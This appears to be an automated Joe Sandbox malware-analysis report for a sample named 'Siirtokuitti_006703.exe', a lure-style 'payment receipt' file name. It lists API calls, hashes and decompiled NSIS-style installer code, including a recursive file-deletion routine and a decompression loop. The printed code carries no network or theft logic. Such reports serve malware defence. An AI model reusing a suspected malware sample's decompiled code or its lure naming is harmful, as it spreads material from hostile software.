                                                                                                                      0x00405219
                                                                                                                      0x0040521b
                                                                                                                      0x0040521f
                                                                                                                      0x0040522f
                                                                                                                      0x00405239
                                                                                                                      0x0040523b
                                                                                                                      0x0040523e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405221
                                                                                                                      0x00405221
                                                                                                                      0x00405227
                                                                                                                      0x00405229
                                                                                                                      0x00405229
                                                                                                                      0x0040522a
                                                                                                                      0x0040522b
                                                                                                                      0x00000000
                                                                                                                      0x00405221
                                                                                                                      0x00405204
                                                                                                                      0x004051df
                                                                                                                      0x00405122
                                                                                                                      0x00000000
                                                                                                                      0x00405138
                                                                                                                      0x00405142
                                                                                                                      0x00405147
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405159
                                                                                                                      0x0040515e
                                                                                                                      0x0040516a
                                                                                                                      0x0040516a
                                                                                                                      0x0040516c
                                                                                                                      0x0040517b
                                                                                                                      0x0040517d
                                                                                                                      0x00405181
                                                                                                                      0x00405184
                                                                                                                      0x00000000
                                                                                                                      0x00405184
                                                                                                                      0x00405122
                                                                                                                      0x00404de2
                                                                                                                      0x00404de7
                                                                                                                      0x00404df0
                                                                                                                      0x00404df7
                                                                                                                      0x00404e05
                                                                                                                      0x00404e10
                                                                                                                      0x00404e16
                                                                                                                      0x00404e24
                                                                                                                      0x00404e38
                                                                                                                      0x00404e3d
                                                                                                                      0x00404e4a
                                                                                                                      0x00404e4f
                                                                                                                      0x00404e65
                                                                                                                      0x00404e76
                                                                                                                      0x00404e83
                                                                                                                      0x00404e83
                                                                                                                      0x00404e86
                                                                                                                      0x00404e8c
                                                                                                                      0x00404e8e
                                                                                                                      0x00404e91
                                                                                                                      0x00404e96
                                                                                                                      0x00404e9b
                                                                                                                      0x00404e9d
                                                                                                                      0x00404e9d
                                                                                                                      0x00404eb1
                                                                                                                      0x00404ebd
                                                                                                                      0x00404ebd
                                                                                                                      0x00404ebf
                                                                                                                      0x00404ec0
                                                                                                                      0x00404ec5
                                                                                                                      0x00404ec8
                                                                                                                      0x00404ecb
                                                                                                                      0x00404ecf
                                                                                                                      0x00404ed4
                                                                                                                      0x00404ed9
                                                                                                                      0x00404edd
                                                                                                                      0x00404ee2
                                                                                                                      0x00404ee7
                                                                                                                      0x00404ee9
                                                                                                                      0x00404ef1
                                                                                                                      0x00404fbc
                                                                                                                      0x00404fcf
                                                                                                                      0x00000000
                                                                                                                      0x00404ef7
                                                                                                                      0x00404efa
                                                                                                                      0x00404efd
                                                                                                                      0x00404f00
                                                                                                                      0x00404f00
                                                                                                                      0x00404f07
                                                                                                                      0x00404f0d
                                                                                                                      0x00404f10
                                                                                                                      0x00404f16
                                                                                                                      0x00404f17
                                                                                                                      0x00404f1c
                                                                                                                      0x00404f25
                                                                                                                      0x00404f2c
                                                                                                                      0x00404f2f
                                                                                                                      0x00404f32
                                                                                                                      0x00404f35
                                                                                                                      0x00404f71
                                                                                                                      0x00404f92
                                                                                                                      0x00404f9a
                                                                                                                      0x00404f73
                                                                                                                      0x00404f80
                                                                                                                      0x00404f80
                                                                                                                      0x00404f37
                                                                                                                      0x00404f3a
                                                                                                                      0x00404f49
                                                                                                                      0x00404f53
                                                                                                                      0x00404f5b
                                                                                                                      0x00404f62
                                                                                                                      0x00404f6a
                                                                                                                      0x00404f6a
                                                                                                                      0x00404f35
                                                                                                                      0x00404fa0
                                                                                                                      0x00404fa1
                                                                                                                      0x00404fad
                                                                                                                      0x00404fad
                                                                                                                      0x00404fba
                                                                                                                      0x00404fd5
                                                                                                                      0x00404fd9
                                                                                                                      0x00404ff6
                                                                                                                      0x00404ffb
                                                                                                                      0x00000000
                                                                                                                      0x00404fdb
                                                                                                                      0x00404fe0
                                                                                                                      0x00404fe9
                                                                                                                      0x00405373
                                                                                                                      0x00405385
                                                                                                                      0x00405385
                                                                                                                      0x00404fd9
                                                                                                                      0x00000000
                                                                                                                      0x00404fba
                                                                                                                      0x00404ef1

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DA8
                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DB3
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DFD
                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E10
                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405388), ref: 00404E29
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E3D
                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E4F
                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404E65
                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E71
                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E83
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404E86
                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EB1
                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EBD
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F53
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404F7E
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F92
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FC1
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FCF
                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404FE0
                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004050DD
                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405142
                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405157
                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040517B
                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040519B
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051B0
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004051C0
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405239
                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004052E2
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004052F1
                                                                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 00405311
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040535F
                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040536A
                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405371
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                      • String ID: $M$N
                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                      • Opcode ID: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                      • Instruction ID: 31ae2990ecb9e768136dc40aca02b7f59ce629e1f3cadc681249b7cbd6abf0de
                                                                                                                      • Opcode Fuzzy Hash: dd7e303e7a082920acbddfa323b9c1fe09c51fd00b8ac91a0555c01a181f07cb
                                                                                                                      • Instruction Fuzzy Hash: 09027DB0A00609EFDB209F54DC45AAE7BB5FB44354F10817AE610BA2E0C7798E52CF58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 511 405abe-405ae4 call 405d89 514 405ae6-405af8 DeleteFileW 511->514 515 405afd-405b04 511->515 516 405c7a-405c7e 514->516 517 405b06-405b08 515->517 518 405b17-405b27 call 4063b0 515->518 519 405c28-405c2d 517->519 520 405b0e-405b11 517->520 526 405b36-405b37 call 405ccd 518->526 527 405b29-405b34 lstrcatW 518->527 519->516 523 405c2f-405c32 519->523 520->518 520->519 524 405c34-405c3a 523->524 525 405c3c-405c44 call 4066f3 523->525 524->516 525->516 535 405c46-405c5a call 405c81 call 405a76 525->535 529 405b3c-405b40 526->529 527->529 531 405b42-405b4a 529->531 532 405b4c-405b52 lstrcatW 529->532 531->532 534 405b57-405b73 lstrlenW FindFirstFileW 531->534 532->534 536 405b79-405b81 534->536 537 405c1d-405c21 534->537 551 405c72-405c75 call 405414 535->551 552 405c5c-405c5f 535->552 539 405ba1-405bb5 call 4063b0 536->539 540 405b83-405b8b 536->540 537->519 542 405c23 537->542 553 405bb7-405bbf 539->553 554 405bcc-405bd7 call 405a76 539->554 543 405c00-405c10 FindNextFileW 540->543 544 405b8d-405b95 540->544 542->519 543->536 550 405c16-405c17 FindClose 543->550 544->539 547 405b97-405b9f 544->547 547->539 547->543 550->537 551->516 552->524 556 405c61-405c70 call 405414 call 406176 552->556 553->543 557 405bc1-405bca call 405abe 553->557 562 405bf8-405bfb call 405414 554->562 563 405bd9-405bdc 554->563 556->516 557->543 562->543 566 405bf0-405bf6 563->566 567 405bde-405bee call 405414 call 406176 563->567 566->543 567->543
                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00405ABE(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				short _v556;
                                                                                                                      				short _v558;
                                                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                                                      				signed int _t38;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t55;
                                                                                                                      				signed int _t62;
                                                                                                                      				void* _t64;
                                                                                                                      				signed char _t65;
                                                                                                                      				WCHAR* _t66;
                                                                                                                      				void* _t67;
                                                                                                                      				WCHAR* _t68;
                                                                                                                      				void* _t70;
                                                                                                                      
                                                                                                                      				_t65 = _a8;
                                                                                                                      				_t68 = _a4;
                                                                                                                      				_v8 = _t65 & 0x00000004;
                                                                                                                      				_t38 = E00405D89(__eflags, _t68);
                                                                                                                      				_v12 = _t38;
                                                                                                                      				if((_t65 & 0x00000008) != 0) {
                                                                                                                      					_t62 = DeleteFileW(_t68); // executed
                                                                                                                      					asm("sbb eax, eax");
                                                                                                                      					_t64 =  ~_t62 + 1;
                                                                                                                      					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                                                                      					return _t64;
                                                                                                                      				}
                                                                                                                      				_a4 = _t65;
                                                                                                                      				_t8 =  &_a4;
                                                                                                                      				 *_t8 = _a4 & 0x00000001;
                                                                                                                      				__eflags =  *_t8;
                                                                                                                      				if( *_t8 == 0) {
                                                                                                                      					L5:
                                                                                                                      					E004063B0(0x425730, _t68);
                                                                                                                      					__eflags = _a4;
                                                                                                                      					if(_a4 == 0) {
                                                                                                                      						E00405CCD(_t68);
                                                                                                                      					} else {
                                                                                                                      						lstrcatW(0x425730, L"\\*.*");
                                                                                                                      					}
                                                                                                                      					__eflags =  *_t68;
                                                                                                                      					if( *_t68 != 0) {
                                                                                                                      						L10:
                                                                                                                      						lstrcatW(_t68, 0x40a014);
                                                                                                                      						L11:
                                                                                                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                                                      						_t38 = FindFirstFileW(0x425730,  &_v604); // executed
                                                                                                                      						_t70 = _t38;
                                                                                                                      						__eflags = _t70 - 0xffffffff;
                                                                                                                      						if(_t70 == 0xffffffff) {
                                                                                                                      							L26:
                                                                                                                      							__eflags = _a4;
                                                                                                                      							if(_a4 != 0) {
                                                                                                                      								_t30 = _t66 - 2;
                                                                                                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                                                      								__eflags =  *_t30;
                                                                                                                      							}
                                                                                                                      							goto L28;
                                                                                                                      						} else {
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						do {
                                                                                                                      							L12:
                                                                                                                      							__eflags = _v604.cFileName - 0x2e;
                                                                                                                      							if(_v604.cFileName != 0x2e) {
                                                                                                                      								L16:
                                                                                                                      								E004063B0(_t66,  &(_v604.cFileName));
                                                                                                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									_t52 = E00405A76(__eflags, _t68, _v8);
                                                                                                                      									__eflags = _t52;
                                                                                                                      									if(_t52 != 0) {
                                                                                                                      										E00405414(0xfffffff2, _t68);
                                                                                                                      									} else {
                                                                                                                      										__eflags = _v8 - _t52;
                                                                                                                      										if(_v8 == _t52) {
                                                                                                                      											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                      										} else {
                                                                                                                      											E00405414(0xfffffff1, _t68);
                                                                                                                      											E00406176(_t67, _t68, 0);
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										E00405ABE(__eflags, _t68, _a8);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L24;
                                                                                                                      							}
                                                                                                                      							__eflags = _v558;
                                                                                                                      							if(_v558 == 0) {
                                                                                                                      								goto L24;
                                                                                                                      							}
                                                                                                                      							__eflags = _v558 - 0x2e;
                                                                                                                      							if(_v558 != 0x2e) {
                                                                                                                      								goto L16;
                                                                                                                      							}
                                                                                                                      							__eflags = _v556;
                                                                                                                      							if(_v556 == 0) {
                                                                                                                      								goto L24;
                                                                                                                      							}
                                                                                                                      							goto L16;
                                                                                                                      							L24:
                                                                                                                      							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                                                      							__eflags = _t55;
                                                                                                                      						} while (_t55 != 0);
                                                                                                                      						_t38 = FindClose(_t70);
                                                                                                                      						goto L26;
                                                                                                                      					}
                                                                                                                      					__eflags =  *0x425730 - 0x5c;
                                                                                                                      					if( *0x425730 != 0x5c) {
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      					goto L10;
                                                                                                                      				} else {
                                                                                                                      					__eflags = _t38;
                                                                                                                      					if(_t38 == 0) {
                                                                                                                      						L28:
                                                                                                                      						__eflags = _a4;
                                                                                                                      						if(_a4 == 0) {
                                                                                                                      							L36:
                                                                                                                      							return _t38;
                                                                                                                      						}
                                                                                                                      						__eflags = _v12;
                                                                                                                      						if(_v12 != 0) {
                                                                                                                      							_t38 = E004066F3(_t68);
                                                                                                                      							__eflags = _t38;
                                                                                                                      							if(_t38 == 0) {
                                                                                                                      								goto L36;
                                                                                                                      							}
                                                                                                                      							E00405C81(_t68);
                                                                                                                      							_t38 = E00405A76(__eflags, _t68, _v8 | 0x00000001);
                                                                                                                      							__eflags = _t38;
                                                                                                                      							if(_t38 != 0) {
                                                                                                                      								return E00405414(0xffffffe5, _t68);
                                                                                                                      							}
                                                                                                                      							__eflags = _v8;
                                                                                                                      							if(_v8 == 0) {
                                                                                                                      								goto L30;
                                                                                                                      							}
                                                                                                                      							E00405414(0xfffffff1, _t68);
                                                                                                                      							return E00406176(_t67, _t68, 0);
                                                                                                                      						}
                                                                                                                      						L30:
                                                                                                                      						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                                                      						return _t38;
                                                                                                                      					}
                                                                                                                      					__eflags = _t65 & 0x00000002;
                                                                                                                      					if((_t65 & 0x00000002) == 0) {
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					goto L5;
                                                                                                                      				}
                                                                                                                      			}


















                                                                                                                      0x00405ac8
                                                                                                                      0x00405acd
                                                                                                                      0x00405ad6
                                                                                                                      0x00405ad9
                                                                                                                      0x00405ae1
                                                                                                                      0x00405ae4
                                                                                                                      0x00405ae7
                                                                                                                      0x00405aef
                                                                                                                      0x00405af1
                                                                                                                      0x00405af2
                                                                                                                      0x00000000
                                                                                                                      0x00405af2
                                                                                                                      0x00405afd
                                                                                                                      0x00405b00
                                                                                                                      0x00405b00
                                                                                                                      0x00405b00
                                                                                                                      0x00405b04
                                                                                                                      0x00405b17
                                                                                                                      0x00405b1e
                                                                                                                      0x00405b23
                                                                                                                      0x00405b27
                                                                                                                      0x00405b37
                                                                                                                      0x00405b29
                                                                                                                      0x00405b2f
                                                                                                                      0x00405b2f
                                                                                                                      0x00405b3c
                                                                                                                      0x00405b40
                                                                                                                      0x00405b4c
                                                                                                                      0x00405b52
                                                                                                                      0x00405b57
                                                                                                                      0x00405b5d
                                                                                                                      0x00405b68
                                                                                                                      0x00405b6e
                                                                                                                      0x00405b70
                                                                                                                      0x00405b73
                                                                                                                      0x00405c1d
                                                                                                                      0x00405c1d
                                                                                                                      0x00405c21
                                                                                                                      0x00405c23
                                                                                                                      0x00405c23
                                                                                                                      0x00405c23
                                                                                                                      0x00405c23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405b79
                                                                                                                      0x00405b79
                                                                                                                      0x00405b79
                                                                                                                      0x00405b81
                                                                                                                      0x00405ba1
                                                                                                                      0x00405ba9
                                                                                                                      0x00405bae
                                                                                                                      0x00405bb5
                                                                                                                      0x00405bd0
                                                                                                                      0x00405bd5
                                                                                                                      0x00405bd7
                                                                                                                      0x00405bfb
                                                                                                                      0x00405bd9
                                                                                                                      0x00405bd9
                                                                                                                      0x00405bdc
                                                                                                                      0x00405bf0
                                                                                                                      0x00405bde
                                                                                                                      0x00405be1
                                                                                                                      0x00405be9
                                                                                                                      0x00405be9
                                                                                                                      0x00405bdc
                                                                                                                      0x00405bb7
                                                                                                                      0x00405bbd
                                                                                                                      0x00405bbf
                                                                                                                      0x00405bc5
                                                                                                                      0x00405bc5
                                                                                                                      0x00405bbf
                                                                                                                      0x00000000
                                                                                                                      0x00405bb5
                                                                                                                      0x00405b83
                                                                                                                      0x00405b8b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405b8d
                                                                                                                      0x00405b95
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405b97
                                                                                                                      0x00405b9f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405c00
                                                                                                                      0x00405c08
                                                                                                                      0x00405c0e
                                                                                                                      0x00405c0e
                                                                                                                      0x00405c17
                                                                                                                      0x00000000
                                                                                                                      0x00405c17
                                                                                                                      0x00405b42
                                                                                                                      0x00405b4a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405b06
                                                                                                                      0x00405b06
                                                                                                                      0x00405b08
                                                                                                                      0x00405c28
                                                                                                                      0x00405c2a
                                                                                                                      0x00405c2d
                                                                                                                      0x00405c7e
                                                                                                                      0x00405c7e
                                                                                                                      0x00405c7e
                                                                                                                      0x00405c2f
                                                                                                                      0x00405c32
                                                                                                                      0x00405c3d
                                                                                                                      0x00405c42
                                                                                                                      0x00405c44
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405c47
                                                                                                                      0x00405c53
                                                                                                                      0x00405c58
                                                                                                                      0x00405c5a
                                                                                                                      0x00000000
                                                                                                                      0x00405c75
                                                                                                                      0x00405c5c
                                                                                                                      0x00405c5f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405c64
                                                                                                                      0x00000000
                                                                                                                      0x00405c6b
                                                                                                                      0x00405c34
                                                                                                                      0x00405c34
                                                                                                                      0x00000000
                                                                                                                      0x00405c34
                                                                                                                      0x00405b0e
                                                                                                                      0x00405b11
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00405b11

                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75832EE0,00000000), ref: 00405AE7
                                                                                                                      • lstrcatW.KERNEL32(Projektgruppen\Betalingsunion\componendo\Pietros.Unm,\*.*), ref: 00405B2F
                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405B52
                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,Projektgruppen\Betalingsunion\componendo\Pietros.Unm,?,?,C:\Users\user\AppData\Local\Temp\,75832EE0,00000000), ref: 00405B58
                                                                                                                      • FindFirstFileW.KERNELBASE(Projektgruppen\Betalingsunion\componendo\Pietros.Unm,?,?,?,0040A014,?,Projektgruppen\Betalingsunion\componendo\Pietros.Unm,?,?,C:\Users\user\AppData\Local\Temp\,75832EE0,00000000), ref: 00405B68
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C17
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                      • String ID: "C:\Users\user\Desktop\Siirtokuitti_006703.exe"$C:\Users\user\AppData\Local\Temp\$Projektgruppen\Betalingsunion\componendo\Pietros.Unm$\*.*
                                                                                                                      • API String ID: 2035342205-3667752243
                                                                                                                      • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                      • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                                                                      • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                                                                      • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00406ABA() {
                                                                                                                      				unsigned short _t531;
                                                                                                                      				signed int _t532;
                                                                                                                      				void _t533;
                                                                                                                      				void* _t534;
                                                                                                                      				signed int _t535;
                                                                                                                      				signed int _t565;
                                                                                                                      				signed int _t568;
                                                                                                                      				signed int _t590;
                                                                                                                      				signed int* _t607;
                                                                                                                      				void* _t614;
                                                                                                                      
                                                                                                                      				L0:
                                                                                                                      				while(1) {
                                                                                                                      					L0:
                                                                                                                      					if( *(_t614 - 0x40) != 0) {
                                                                                                                      						 *(_t614 - 0x34) = 1;
                                                                                                                      						 *(_t614 - 0x84) = 7;
                                                                                                                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                      						L132:
                                                                                                                      						 *(_t614 - 0x54) = _t607;
                                                                                                                      						L133:
                                                                                                                      						_t531 =  *_t607;
                                                                                                                      						_t590 = _t531 & 0x0000ffff;
                                                                                                                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                      						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                      							 *(_t614 - 0x40) = 1;
                                                                                                                      							_t532 = _t531 - (_t531 >> 5);
                                                                                                                      							 *_t607 = _t532;
                                                                                                                      						} else {
                                                                                                                      							 *(_t614 - 0x10) = _t565;
                                                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                      						}
                                                                                                                      						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                      							L139:
                                                                                                                      							_t533 =  *(_t614 - 0x84);
                                                                                                                      							L140:
                                                                                                                      							 *(_t614 - 0x88) = _t533;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							L137:
                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                      								 *(_t614 - 0x88) = 5;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                      							goto L139;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                      						__esi =  *(__ebp - 0x60);
                                                                                                                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                      						__ecx =  *(__ebp - 0x3c);
                                                                                                                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                      						__ecx =  *(__ebp - 4);
                                                                                                                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                      						if( *(__ebp - 0x38) >= 4) {
